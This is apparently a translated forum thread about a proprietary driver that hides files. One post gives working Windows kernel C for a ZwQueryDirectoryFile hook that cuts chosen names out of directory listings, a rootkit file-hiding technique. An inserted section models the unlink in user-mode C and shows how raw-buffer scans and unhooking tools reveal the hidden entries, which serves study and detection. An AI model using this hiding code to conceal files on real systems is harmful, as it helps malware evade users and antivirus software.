Ability: ( LV12,RANK:370 )
Post #2
Which functions does windrvNt.sys hook?
Uploaded attachment:
Ability: ( LV2,RANK:10 )
Post #3
It probably uses a rootkit technique; I made something similar, it's available for download on 看雪.
Ability: ( LV6,RANK:90 )
Post #4
Still learning...
Ability: ( LV2,RANK:10 )
Post #5
How did this turn into Trend Micro? Isn't it McAfee (麦咖啡)?
Ability: ( LV2,RANK:10 )
Post #6
Slip of the tongue, I meant McAfee (卖咖啡).
Ability: ( LV2,RANK:10 )
Post #7
Right, it is windrvNT, but that's NewSoftware's own proprietary program, so how it works is anyone's guess...
Ability: ( LV2,RANK:10 )
Post #8
A rootkit is a trojan technique, isn't it? Won't that set off all the major antivirus products...
Ability: ( LV9,RANK:330 )
Post #9
Set up a dual boot or boot the system from WinPE, then you can see everything, no?
Ability: ( LV12,RANK:760 )
Post #10
Use RKU to restore the hooked spots and it's done right away~
Still too weak~
Ability: ( LV12,RANK:760 )
Post #11
Here's the hiding code from one of my toys~
#include <ntddk.h>
#include "file.h"
#include "disk.h"

typedef unsigned char BYTE, *PBYTE;

// names to hide, compared case-insensitively against each directory entry
WCHAR *FileToHide[128];
ULONG NbFileToHide = 0;

/*
 * ZwQueryDirectoryFile hook, DKOM style: let the real call fill the caller's
 * buffer, then cut the entries we want to hide out of the NextEntryOffset
 * chain before returning. How the hook is installed is not part of this post.
 */
ZWQUERYDIRECTORYFILE ZwQueryDirectoryFileAddress = NULL;

NTSTATUS ZwQueryDirectoryFileHook(
    IN HANDLE FileHandle,
    IN HANDLE Event OPTIONAL,
    IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,
    IN PVOID ApcContext OPTIONAL,
    OUT PIO_STATUS_BLOCK IoStatusBlock,
    OUT PVOID FileInformation,
    IN ULONG FileInformationLength,
    IN FILE_INFORMATION_CLASS FileInformationClass,
    IN BOOLEAN ReturnSingleEntry,
    IN PUNICODE_STRING FileName OPTIONAL,
    IN BOOLEAN RestartScan
    )
{
    NTSTATUS status;
    ULONG NameOffset;
    ULONG NameSizeOffset;
    PBYTE curr, prev;
    ULONG Delta;
    UNICODE_STRING EntryName;
    UNICODE_STRING HiddenName;
    ULONG i;

    status = ZwQueryDirectoryFileAddress(
        FileHandle, Event, ApcRoutine, ApcContext, IoStatusBlock,
        FileInformation, FileInformationLength, FileInformationClass,
        ReturnSingleEntry, FileName, RestartScan);
    if (!NT_SUCCESS(status))
        return status;

    // an asynchronous call may return before the buffer is filled in;
    // this toy only post-processes synchronous calls
    if (Event != NULL || ApcRoutine != NULL)
        return status;

    switch (FileInformationClass) {
    /*
     * Every class we care about starts with NextEntryOffset and carries
     * FileNameLength/FileName, so one walk handles all of them: we only
     * need the two field offsets of the class in use.
     */
    case FileDirectoryInformation:
        NameOffset     = FIELD_OFFSET(FILE_DIRECTORY_INFORMATION, FileName);
        NameSizeOffset = FIELD_OFFSET(FILE_DIRECTORY_INFORMATION, FileNameLength);
        break;
    case FileFullDirectoryInformation:
        NameOffset     = FIELD_OFFSET(FILE_FULL_DIR_INFORMATION, FileName);
        NameSizeOffset = FIELD_OFFSET(FILE_FULL_DIR_INFORMATION, FileNameLength);
        break;
    case FileBothDirectoryInformation:
        NameOffset     = FIELD_OFFSET(FILE_BOTH_DIR_INFORMATION, FileName);
        NameSizeOffset = FIELD_OFFSET(FILE_BOTH_DIR_INFORMATION, FileNameLength);
        break;
    case FileNamesInformation:
        NameOffset     = FIELD_OFFSET(FILE_NAMES_INFORMATION, FileName);
        NameSizeOffset = FIELD_OFFSET(FILE_NAMES_INFORMATION, FileNameLength);
        break;
    case FileIdBothDirectoryInformation:
        NameOffset     = FIELD_OFFSET(FILE_ID_BOTH_DIR_INFORMATION, FileName);
        NameSizeOffset = FIELD_OFFSET(FILE_ID_BOTH_DIR_INFORMATION, FileNameLength);
        break;
    case FileIdFullDirectoryInformation:
        NameOffset     = FIELD_OFFSET(FILE_ID_FULL_DIR_INFORMATION, FileName);
        NameSizeOffset = FIELD_OFFSET(FILE_ID_FULL_DIR_INFORMATION, FileNameLength);
        break;
    default:
        // not a listing class, nothing to filter
        return status;
    }

    for (i = 0; i < NbFileToHide; i++) {
        RtlInitUnicodeString(&HiddenName, FileToHide[i]);
        curr = (PBYTE)FileInformation;
        prev = NULL;
        while (curr != NULL) {
            Delta = *(PULONG)curr;   // NextEntryOffset, 0 marks the last entry

            // view the entry's (non-terminated) name as a counted string so we
            // can compare case-insensitively without touching the caller's buffer
            EntryName.Buffer        = (PWCH)(curr + NameOffset);
            EntryName.Length        = (USHORT)*(PULONG)(curr + NameSizeOffset);
            EntryName.MaximumLength = EntryName.Length;

            if (RtlEqualUnicodeString(&EntryName, &HiddenName, TRUE)) {
                if (prev == NULL) {
                    // first entry: nothing points at it, so it cannot be
                    // unlinked; slide the rest of the buffer down over it
                    if (Delta != 0) {
                        RtlMoveMemory(curr, curr + Delta,
                                      IoStatusBlock->Information - Delta);
                        IoStatusBlock->Information -= Delta;
                        continue;   // re-examine what now sits at curr
                    }
                    // it was the only entry: report an empty result
                    // (with ReturnSingleEntry this ends the listing early;
                    // a complete fix would query the original again)
                    IoStatusBlock->Information = 0;
                    return STATUS_NO_MORE_FILES;
                }
                if (Delta != 0)
                    *(PULONG)prev += Delta;   // previous entry now points past us
                else
                    *(PULONG)prev = 0;        // we were the last entry
            }
            else {
                // not hidden: this becomes the predecessor of the next entry
                prev = curr;
            }
            curr = (Delta != 0) ? curr + Delta : NULL;
        }
    }
    return status;
}
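An added example, not code from the post above or from the driver this thread is about: a user-mode C model of the unlink step the hook performs on the FILE_*_INFORMATION buffer once the real ZwQueryDirectoryFile has filled it. The struct is our own cut-down stand-in with only the fields the hook touches, the listing and the names to hide are constructed, and the head-of-list case is handled by sliding the buffer down, since changing a local copy of the FileInformation pointer (as the posted code did) never reaches the caller. It finishes with a raw byte scan to show that unlinked entries are still physically in the buffer: only the NextEntryOffset chain was cut, which is what a tool reading memory rather than walking the chain would find.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Stand-in for FILE_DIRECTORY_INFORMATION with only the fields the hook uses. */
typedef struct {
    uint32_t NextEntryOffset;   /* first field in every class; 0 = last entry */
    uint32_t FileNameLength;    /* bytes of UTF-16, not NUL-terminated */
    uint16_t FileName[1];       /* variable length */
} DIR_ENTRY;

/* Chain ASCII names into an 8-byte aligned listing; returns the byte count the
 * kernel would report in IoStatusBlock->Information. Constructed input only. */
static size_t build_listing(uint8_t *buf, const char **names, int n)
{
    size_t used = 0;
    for (int i = 0; i < n; i++) {
        DIR_ENTRY *e = (DIR_ENTRY *)(buf + used);
        size_t len = strlen(names[i]);
        size_t size = (offsetof(DIR_ENTRY, FileName) + len * 2 + 7) & ~(size_t)7;
        memset(e, 0, size);
        e->FileNameLength = (uint32_t)(len * 2);
        for (size_t k = 0; k < len; k++) e->FileName[k] = (uint16_t)names[i][k];
        e->NextEntryOffset = (i + 1 < n) ? (uint32_t)size : 0;
        used += size;
    }
    return used;
}

static int fold(int c) { return (c >= 'A' && c <= 'Z') ? c + 32 : c; }

/* Read-only, case-insensitive compare of a UTF-16 entry name with an ASCII
 * pattern (the posted hook _wcsupr()'d the caller's buffer in place instead). */
static int name_equal_ci(const uint16_t *a, uint32_t abytes, const char *b)
{
    if (abytes != strlen(b) * 2) return 0;
    for (size_t k = 0; k < abytes / 2; k++)
        if (fold(a[k]) != fold((unsigned char)b[k])) return 0;
    return 1;
}

/* The hook's post-processing: cut each name in hide[] out of the chain and
 * return the byte count the caller should be told. */
size_t hide_entries(uint8_t *buf, size_t used, const char **hide, int nhide)
{
    for (int i = 0; i < nhide && used > 0; i++) {
        uint8_t *curr = buf, *prev = NULL;
        while (curr) {
            DIR_ENTRY *e = (DIR_ENTRY *)curr;
            uint32_t delta = e->NextEntryOffset;
            if (!name_equal_ci(e->FileName, e->FileNameLength, hide[i])) {
                prev = curr;                    /* visible: becomes the predecessor */
            } else if (prev == NULL) {          /* head entry: nothing points at it */
                if (delta == 0) return 0;       /* it was the only entry: empty listing */
                memmove(buf, buf + delta, used - delta);    /* slide the rest down */
                used -= delta;
                continue;                       /* re-examine the new head */
            } else {                            /* predecessor skips over us */
                ((DIR_ENTRY *)prev)->NextEntryOffset =
                    delta ? ((DIR_ENTRY *)prev)->NextEntryOffset + delta : 0;
            }
            curr = delta ? curr + delta : NULL;
        }
    }
    return used;
}

static char g_visible[8][32];       /* names a chain-walking caller would see */
int g_residue, g_after_hide_all;    /* raw-scan hit; entries left after hiding all */

/* Walk the chain the way FindNextFile does; fills g_visible. */
static int list_visible(const uint8_t *buf, size_t used)
{
    int n = 0;
    for (const uint8_t *curr = used ? buf : NULL; curr && n < 8; n++) {
        const DIR_ENTRY *e = (const DIR_ENTRY *)curr;
        size_t len = e->FileNameLength / 2 < 31 ? e->FileNameLength / 2 : 31;
        for (size_t k = 0; k < len; k++) g_visible[n][k] = (char)e->FileName[k];
        g_visible[n][len] = '\0';
        curr = e->NextEntryOffset ? curr + e->NextEntryOffset : NULL;
    }
    return n;
}

/* Scan the raw bytes instead of the chain, as a forensic tool would. */
static int raw_contains(const uint8_t *buf, size_t used, const char *ascii)
{
    uint16_t pat[32];
    size_t bytes = strlen(ascii) * 2;
    for (size_t k = 0; k < bytes / 2; k++) pat[k] = (uint16_t)ascii[k];
    for (size_t off = 0; off + bytes <= used; off += 2)
        if (memcmp(buf + off, pat, bytes) == 0) return 1;
    return 0;
}

/* Constructed scenario: hide the first, a middle and the last entry, then hide
 * everything that is left to exercise the "only entry" path. */
int run_demo(void)
{
    static const char *listing[] = {"rootkit.sys", "boot.ini", "secret.dat", "readme.txt", "notes.txt"};
    static const char *hide[] = {"ROOTKIT.SYS", "secret.dat", "NOTES.TXT"};
    union { uint64_t align; uint8_t b[512]; } raw;   /* 8-byte aligned like a real buffer */
    uint8_t *buf = raw.b;
    size_t used = hide_entries(buf, build_listing(buf, listing, 5), hide, 3);
    g_residue = raw_contains(buf, used, "secret.dat");
    int n = list_visible(buf, used);
    g_after_hide_all = list_visible(buf, hide_entries(buf, used, listing, 5));
    return n;
}
```

Build with a C99 compiler and call run_demo(): the caller sees only boot.ini and readme.txt, g_residue is 1 because secret.dat's bytes never left the buffer, and hiding the remaining names yields an empty listing rather than a dangling head entry. The same two properties carry over to the kernel hook: the head entry needs a memmove (or a re-query), and a hidden name can still be recovered from the buffer or from the original call's output, which is one reason unhooking tools such as the RKU mentioned in post #10 defeat this class of hiding.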
Ability: ( LV2,RANK:10 )
Post #12
+1 for cvcvxk's code, but if you aren't modifying the SSDT or overwriting the kernel function's prologue, how do you get to hook ZwQueryDirectoryFile at all? And how is that DKOM?
Ability: ( LV2,RANK:10 )
Post #13
I tried dual boot, couldn't crack it...
Ability: ( LV12,RANK:760 )
Post #14
Couldn't crack it? You mean the encrypted part?
With dual boot you can see everything, it's just that there's encryption on top~